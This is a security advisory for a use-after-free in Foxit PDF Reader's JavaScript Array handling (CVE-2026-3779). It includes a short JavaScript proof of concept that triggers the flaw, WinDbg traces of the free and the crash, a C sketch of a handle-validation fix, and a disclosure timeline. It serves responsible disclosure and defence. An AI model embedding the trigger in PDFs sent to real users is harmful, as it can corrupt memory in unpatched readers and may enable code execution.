CVE-2026-3779

A use-after-free vulnerability exists in the way Foxit Reader handles an Array object. Specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2025.3.0.35737

Foxit Reader – https://www.foxitsoftware.com/pdf-reader/

7.8 – CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE-416 – Use After Free

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles an array object. This can be illustrated by the following proof-of-concept code:

```
function main() {
    app.activeDocs[0].getField('List Box0').setItems(['a', app.activeDocs[0]["IDS_MONTH_INFO"]]);
    getField("txt2").setAction("Calculate", 'delete_pages();');
    app.activeDocs[0].getField('List Box0')['value'] = new Array(10);
}

function delete_pages() {
    app.activeDocs[0].deletePages();
}
```

The above code simply assigns a callback function to the `Calculate` event for the field `txt2`, which is promptly triggered by a call to `getField`. In the action callback, all that happens is a call to `deletePages`, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when an array object is freed by `deletePages()` and is used without any validation. We can observe the following in the debugger (with PageHeap enabled):

```
0:007> p
Breakpoint 1 hit
Time Travel Position: 288B55:368
FoxitPDFReader!safe_vsnprintf+0x3404c7:
00007ff6`f8f076d7 b948000000      mov     ecx,48h  ;<------------- (1)
0:007> p
Time Travel Position: 288B55:369
FoxitPDFReader!safe_vsnprintf+0x3404cc:
00007ff6`f8f076dc e81fa72c00      call    FoxitPDFReader!safe_vsnprintf+0x60abf0 (00007ff6`f91d1e00)  ;<------------- (2)
0:007> p
Time Travel Position: 288B6A:B5F
FoxitPDFReader!safe_vsnprintf+0x3404d1:
00007ff6`f8f076e1 488985d8000000  mov     qword ptr [rbp+0D8h],rax ss:000000af`78be8178=00000248351ddfb0
0:007> r
rax=000002484298bfb0 rbx=00000248377dafd0 rcx=000000007ffe0380
rdx=d0d0d0d0d0d0d0d0 rsi=0000000000400000 rdi=00000248351ddfb0
rip=00007ff6f8f076e1 rsp=000000af78be7fa0 rbp=000000af78be80a0
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000000
r11=000002484298bfb0 r12=00000248351ddfb0 r13=0000000000000000
r14=00007ff6fe5c27b8 r15=00000248377daeb0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!safe_vsnprintf+0x3404d1:
00007ff6`f8f076e1 488985d8000000  mov     qword ptr [rbp+0D8h],rax ss:000000af`78be8178=00000248351ddfb0
0:007> dd 000002484298bfb0  ;<------------- (3)
00000248`4298bfb0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bfc0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bfd0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bfe0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bff0  c0c0c0c0 c0c0c0c0 d0d0d0d0 d0d0d0d0
00000248`4298c000  ???????? ???????? ???????? ????????
00000248`4298c010  ???????? ???????? ???????? ????????
00000248`4298c020  ???????? ???????? ???????? ????????
```

The vulnerable object is created by calling a function at `(2)`, and the size of the object is passed to the function at `(1)`. After allocation, the vulnerable object is examined at `(3)`.

```
0:007> r
rax=0000000000000001 rbx=00000248377dafd0 rcx=0000024854540000
rdx=0000024854540000 rsi=000002482280cfc0 rdi=000002484298bfb0
rip=00007ff6f8f0a1e1 rsp=000000af78bebea0 rbp=000000000000000a
 r8=0000000000000000  r9=0000000000000001 r10=00000000ffffffef
r11=000000af78bebdd0 r12=000000af78bebf78 r13=00000248377daeb0
r14=0000000000000000 r15=00000248351ddfb0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!safe_vsnprintf+0x342fd1:
00007ff6`f8f0a1e1 488bcf          mov     rcx,rdi  ; <------------- (4)
0:007> p
Time Travel Position: 3720A9:254
FoxitPDFReader!safe_vsnprintf+0x342fd4:
00007ff6`f8f0a1e4 e8f77c2c00      call    FoxitPDFReader!safe_vsnprintf+0x60acd0 (00007ff6`f91d1ee0)  ; <------------- (5)

[…]

0:007> p
Time Travel Position: 3720A9:273
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a66:
00007ff6`fc7d1116 4883ec20        sub     rsp,20h
0:007> p
Time Travel Position: 3720A9:274
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6a:
00007ff6`fc7d111a 4c8bc1          mov     r8,rcx  ; <------------- (6)
0:007> dd rcx
00000248`4298bfb0  00000007 00000000 377daeb0 00000248
00000248`4298bfc0  351ddfb0 00000248 00000000 00000000
00000248`4298bfd0  2ddb1ff0 00000248 00000000 00000001
00000248`4298bfe0  00000000 00000008 00000000 c0c0c0c0
00000248`4298bff0  00000000 00000000 d0d0d0d0 d0d0d0d0
00000248`4298c000  ???????? ???????? ???????? ????????
00000248`4298c010  ???????? ???????? ???????? ????????
00000248`4298c020  ???????? ???????? ???????? ????????
0:007> p
Time Travel Position: 3720A9:275
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6d:
00007ff6`fc7d111d 33d2            xor     edx,edx
0:007> p
Time Travel Position: 3720A9:276
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6f:
00007ff6`fc7d111f 488b0d128fde02  mov     rcx,qword ptr [FoxitPDFReader!fLI::FLAGS_v+0xb9af0 (00007ff6`ff5ba038)] ds:00007ff6`ff5ba038=0000024854540000
0:007> p
Time Travel Position: 3720A9:277
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a76:
00007ff6`fc7d1126 ff158cc08900    call    qword ptr [FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x2515b08 (00007ff6`fd06d1b8)] ds:00007ff6`fd06d1b8={KERNEL32!HeapFreeStub (00007ff8`323c58b0)}  ; <------------- (7)
0:007> p
Time Travel Position: 3720AE:249
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a7c:
00007ff6`fc7d112c 85c0            test    eax,eax
0:007> dd 00000248`4298bfb0  ; <------------- (8)
00000248`4298bfb0  00000007 00000000 377daeb0 00000248
00000248`4298bfc0  351ddfb0 00000248 00000000 00000000
00000248`4298bfd0  2ddb1ff0 00000248 00000000 00000001
00000248`4298bfe0  00000000 00000008 00000000 c0c0c0c0
00000248`4298bff0  00000000 00000000 d0d0d0d0 d0d0d0d0
00000248`4298c000  ???????? ???????? ???????? ????????
00000248`4298c010  ???????? ???????? ???????? ????????
00000248`4298c020  ???????? ???????? ???????? ????????
```

Later, when the JavaScript API `deletePages()` is called, it frees all the objects associated with the page. It calls a method at `(5)`, which in turn calls the `HeapFree` function at `(7)` to free the vulnerable object. The `rcx` register at `(6)` contains a pointer to the vulnerable object. The method called at `(7)` frees the object, and the contents of the object are examined at `(8)` after the free operation. Note that the analysis was performed using a TTD trace, and at `(8)` the TTD index shows the last recorded values of the address after it was freed.

The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:

```
0:007> g
(144c.d20): Access violation - code c0000005 (first/second chance not available)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Time Travel Position: 372B43:0
FoxitPDFReader!safe_vsnprintf+0x35695b:
00007ff6`f8f1db6b 488b4910        mov     rcx,qword ptr [rcx+10h] ds:00000248`4298bfc0=00000248351ddfb0  ;<------------- (9)
0:007> u
FoxitPDFReader!safe_vsnprintf+0x35695b:
00007ff6`f8f1db6b 488b4910        mov     rcx,qword ptr [rcx+10h]
00007ff6`f8f1db6f e82c99ffff      call    FoxitPDFReader!safe_vsnprintf+0x350290 (00007ff6`f8f174a0)
00007ff6`f8f1db74 4885c0          test    rax,rax
00007ff6`f8f1db77 7405            je      FoxitPDFReader!safe_vsnprintf+0x35696e (00007ff6`f8f1db7e)
00007ff6`f8f1db79 803805          cmp     byte ptr [rax],5
00007ff6`f8f1db7c 7470            je      FoxitPDFReader!safe_vsnprintf+0x3569de (00007ff6`f8f1dbee)
00007ff6`f8f1db7e 8b03            mov     eax,dword ptr [rbx]
00007ff6`f8f1db80 83e807          sub     eax,7
0:007> r
rax=00000000ffffffff rbx=000002484298bfb0 rcx=000002484298bfb0
rdx=00007ff6fe5c2758 rsi=0000000000000001 rdi=000000af78bed1c8
rip=00007ff6f8f1db6b rsp=000000af78bed090 rbp=0000000000000001
 r8=0000000000000000  r9=0000000000000001 r10=00000000ffffffef
r11=000000af78becf40 r12=0000000000000009 r13=000000af78bed310
r14=000000000000000a r15=00007ff6fe5c2758
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
FoxitPDFReader!safe_vsnprintf+0x35695b:
00007ff6`f8f1db6b 488b4910        mov     rcx,qword ptr [rcx+10h] ds:00000248`4298bfc0=00000248351ddfb0
0:007> dd 000002484298bfb0
00000248`4298bfb0  00000007 00000000 377daeb0 00000248
00000248`4298bfc0  351ddfb0 00000248 00000000 00000000
00000248`4298bfd0  2ddb1ff0 00000248 00000000 00000001
00000248`4298bfe0  00000000 00000008 00000000 c0c0c0c0
00000248`4298bff0  00000000 00000000 d0d0d0d0 d0d0d0d0
00000248`4298c000  ???????? ???????? ???????? ????????
00000248`4298c010  ???????? ???????? ???????? ????????
00000248`4298c020  ???????? ???????? ???????? ????????
0:007> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ff6`f8f1db34     : 00000000`00000001 000000af`78bed1c8 000000af`78bed230 00000000`00000009 : FoxitPDFReader!safe_vsnprintf+0x35695b
01 00007ff6`fa40f92f     : 00000000`00000001 000000af`78bed218 00000000`00000000 00000000`00000001 : FoxitPDFReader!safe_vsnprintf+0x356924
02 00007ff6`fa3f2b10     : 000000af`78bed300 000000af`78bed328 000000af`78bed3d0 000000af`78bed420 : FoxitPDFReader!safe_vsnprintf+0x184871f
03 00007ff6`fa41d2e1     : 00000248`1f0b6e40 000000af`78bed420 00000000`00000001 00000248`34bc3000 : FoxitPDFReader!safe_vsnprintf+0x182b900
04 00007ff6`fa3e5cda     : 00000248`1f0b6e40 00000000`00000000 000000af`78bed430 00000248`1f0b6e40 : FoxitPDFReader!safe_vsnprintf+0x18560d1
05 00007ff6`fa8d91b4     : 00000248`34bc3000 00000248`30804ff0 00000248`41b9fff0 00000248`42d40fe0 : FoxitPDFReader!safe_vsnprintf+0x181eaca
06 00007ff6`fa9722a2     : 00000248`450a20f0 000000af`78bedd08 000000af`78bed480 000000af`78bedce8 : FoxitPDFReader!FXJSE_GetClass+0x824
07 00007ff6`fa98a482     : 000000af`78bedc00 000000af`78bed699 000000af`78bedcf0 00000248`450a20f0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x98bf2
08 00007ff6`fa98a15d     : 000000af`78bedd08 00000000`00000000 000000af`78bedd08 000000af`78bed968 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0dd2
09 00007ff6`fa98ab3b     : 00000000`00000000 00000248`450a20e8 00000000`00000000 00000000`00000000 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0aad
0a 00007ff6`fa98a0ed     : 000000af`78bedd08 000000af`78beda01 000000af`78bedd08 00007ff6`f7270000 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb148b
0b 00007ff6`fa989d1d     : 00000251`00098305 00000002`faaa7f01 00000248`34bc3000 00000251`001b78ad : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0a3d
0c 00007ff6`fb061c38     : 00000000`00000001 000000af`78bedc01 000000af`78bedad0 00000000`0000004e : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb066d
0d 00007ff6`fb058cdc     : 00000000`00000000 00000248`450a4000 00000248`00000003 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x50a588
0e 00007ff6`faf07bee     : 00007ff6`fb058ab0 00000251`001d1675 00000000`0000004e 00000248`450a20d0 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x50162c
0f 00007ff6`faff461b     : 00000251`00000e2d 00000251`00098305 00000251`00000069 ffffffff`fffffffe : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3b053e
10 00007ff6`fae5bfa1     : 00000251`0009e8e1 00000251`001eb615 00000000`00000014 00000251`0018abb1 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x49cf6b
11 00007ff6`fae5bfa1     : 00000251`001d160d 00000251`001eb51d 00000251`001eb56d 00000251`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3048f1
12 00007ff6`fae596d0     : 00000251`001d160d 00000251`00000775 00000251`001eb51d 00000000`0000001a : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3048f1
13 00007ff6`fae59227     : 00000000`00000000 00000000`00000000 00000000`00000002 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x302020
14 00007ff6`fa92f07f     : 000000af`78bee0fc 000000af`78bedfe9 000000af`78bee168 00000000`00000005 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x301b77
15 00007ff6`fa92eb24     : 000000af`78bee168 00000248`34bc3000 00000251`001e0005 00000248`34bcc110 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x559cf
16 00007ff6`fa90ea1b     : 00000248`34bc32b0 000000af`78bee210 00000248`2d161a50 00000248`450a2020 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x55474
17 00007ff6`fa90e781     : 00000248`450a2050 00000248`450a2018 00000248`34bc3000 00000248`44b56fc0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3536b
18 00007ff6`fa8d6746     : 00000248`41ab3ff0 00000248`450a2050 00000248`450a2018 00000248`41ab3ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x350d1
19 00007ff6`fa8d768b     : 00000248`450a2050 00000248`41ab3ff0 00000248`4509be90 00000248`450a2020 : FoxitPDFReader!FXJSE_Runtime_Release+0x1106
1a 00007ff6`fa37f35d     : 00000000`00000000 00000248`30ac2fb8 00000248`30ac2fb8 00000248`30ac2fb0 : FoxitPDFReader!FXJSE_ExecuteScript+0x27b
1b 00007ff6`f7e3dde3     : 00000248`00000003 00000248`1823cb90 000000af`78bee610 000000af`78bee530 : FoxitPDFReader!safe_vsnprintf+0x17b814d
1c 00007ff6`f7e3c4b3     : 00000248`00535ff0 000000af`78bee5c0 00000000`00000000 00000248`1a87afb0 : FoxitPDFReader!std::basic_ios >::fill+0x3ab453
1d 00007ff6`f7e3a866     : 00007ff6`f7e3a790 00000248`00535ff0 00000248`44a94d30 00000000`00000000 : FoxitPDFReader!std::basic_ios >::fill+0x3a9b23
1e 00007ff6`f74992d9     : 00007ff6`f7e3a790 000000af`78bee700 00000248`37bc2dc8 00000248`02c5cfd0 : FoxitPDFReader!std::basic_ios >::fill+0x3a7ed6
1f 00007ff6`f772a93e     : 00000000`00000000 00000000`00060510 00000248`1a87afb0 000000af`78bee740 : FoxitPDFReader!std::basic_ostream >::operator<<+0x7909
20 00007ff6`fc43bbfa     : 00000000`00000189 00000000`00000001 00007ff6`f772a8c0 00000000`00000000 : FoxitPDFReader!std::basic_ostream >::put+0x7023e
21 00007ff6`fc43d107     : 00000248`35104cb0 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18e454a
22 00007ff6`fc43602c     : 00000000`00000000 00000248`5a292eb8 00000000`00000000 00000000`00000429 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18e5a57
23 00007ff6`fc436aec     : 00007ff6`ff382078 00000000`00060510 00000248`5a292e78 00007ff6`fc42c690 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18de97c
24 00007ff8`31d6ef5c     : 00000000`00000001 00000248`5a292e20 00000000`00060510 00000000`00060510 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18df43c
25 00007ff8`31d6e684     : 00000000`00000000 00007ff6`fc436a98 000000af`78dd2800 00007ff6`fc42e33c : USER32!UserCallWinProcCheckWow+0x50c
26 00007ff6`f76a8c7a     : 00007ff6`fc436a98 00000248`024875d0 00000000`00000001 00007ff6`ff5bb190 : USER32!DispatchMessageWorker+0x494
27 00007ff6`f76a8d74     : 00000000`00000001 00007ff6`ff5bb190 00000000`00000000 00000000`00000000 : FoxitPDFReader!std::basic_ostream >::operator<<+0x15f0fa
28 00007ff6`fca24eb7     : 00000000`00000001 00007ff6`f7270000 00000000`00000000 00000248`545bdf3c : FoxitPDFReader!std::basic_ostream >::operator<<+0x15f1f4
29 00007ff6`fc69bdf2     : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1ecd807
2a 00007ff8`323c7374     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1b44742
2b 00007ff8`33c9cc91     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
2c 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
```

The crash occurs at `(9)` when the object is dereferenced without any validation. Depending on the memory layout of the process, it may be possible to perform arbitrary read and write operations, which could ultimately be exploited to achieve arbitrary code execution.
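
The missing validation described above, modelled as an added C example (not Foxit's code and not part of the advisory): page-owned objects are reached through generation-checked handles, so an operation that runs a script callback re-resolves its handle afterwards instead of reusing a cached pointer. The handle table and the names `obj_new`, `obj_get`, `delete_pages` and `set_value` are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical model, not Foxit's code: objects are reached via slot+generation handles. */
#define SLOTS 8
typedef struct { unsigned slot, gen; } handle_t;
typedef struct { int len; } array_obj;          /* stands in for the freed object */
static struct { array_obj *ptr; unsigned gen; } table[SLOTS];

static handle_t obj_new(int len) {
    for (unsigned i = 0; i < SLOTS; i++) {
        if (table[i].ptr) continue;
        array_obj *a = calloc(1, sizeof *a);
        if (!a) break;
        a->len = len;
        table[i].ptr = a;
        return (handle_t){ i, table[i].gen };
    }
    return (handle_t){ SLOTS, 0 };              /* invalid handle */
}

/* NULL if the object was freed, or its slot reused, after the handle was taken. */
static array_obj *obj_get(handle_t h) {
    if (h.slot >= SLOTS || table[h.slot].gen != h.gen) return NULL;
    return table[h.slot].ptr;
}

/* Models deletePages(): frees every page-owned object and invalidates its handles. */
static void delete_pages(void) {
    for (unsigned i = 0; i < SLOTS; i++) {
        free(table[i].ptr);
        table[i].ptr = NULL;
        table[i].gen++;
    }
}

/* Field assignment that runs Calculate midway; the unsafe form caches array_obj* across cb(). */
static int set_value(handle_t h, void (*cb)(void)) {
    if (!obj_get(h)) return -1;
    if (cb) cb();                               /* script may free page objects */
    array_obj *a = obj_get(h);                  /* re-validate before any use */
    return a ? a->len : -1;
}

int main(void) {
    handle_t h = obj_new(10);
    printf("no re-entry: %d\n", set_value(h, NULL));
    printf("Calculate deletes pages: %d\n", set_value(h, delete_pages));
    return 0;
}
```

The generation counter is what rejects a stale handle even after the allocator hands the same slot to a new object, which a plain NULL check on a cached pointer cannot do.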

2026-02-10 – Vendor Disclosure

2026-03-31 – Vendor Patch Release

2026-03-31 – Public Release

Discovered by KPC of Cisco Talos.